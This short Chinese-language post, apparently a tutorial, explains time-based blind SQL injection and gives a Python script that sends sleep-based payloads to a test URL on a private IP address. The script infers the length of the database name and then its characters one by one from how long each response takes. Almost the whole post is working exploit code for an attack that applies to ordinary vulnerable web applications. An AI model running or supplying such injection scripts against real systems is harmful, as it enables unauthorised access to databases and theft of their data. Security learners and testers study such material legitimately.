思路:重要的是構建payload,然後循環進行測試,通過對請求的時間進行判斷payload是否正確,從而確定數據庫的長度和數據庫的名稱.
#encoding=utf-8
#時間盲註腳本
import requests
import time
import datetime
#獲取數據庫長度
def database_len():
#存放跑出的結果
length=0
database=''
print ("start get length...")
for l in range(1,15):
startTime1=time.time()
url1 = "http://172.20.10.14/pentest/test/time/?type=1 and if(length(database())=%d,sleep(1),1)"%(l)
response1 = requests.get(url1)
if time.time() - startTime1 > 1:
length+=l
print ("the length :" , str(length))
# break
print ("start database sql injection...")
database_len()
#獲取數據庫名
def database_name():
name = ''
for j in range(1, 15): #根據數據庫名長度自行修改15這個數值
for i in '0123456789abcdefghijklmnopqrstuvwxyz':
url = '''http://172.20.10.14/pentest/test/time/'''
payload = '''?type=if(substr(database(),%d,1)='%s',sleep(2),1)''' % (
j, i)
# print(url+payload+'%23')
time1 = datetime.datetime.now()
r = requests.get(url + payload + '%23')
time2 = datetime.datetime.now()
sec = (time2 - time1).seconds
if sec >= 2:
name += i
print(name)
break
print('database_name:', name)
database_name()
跑出的效果圖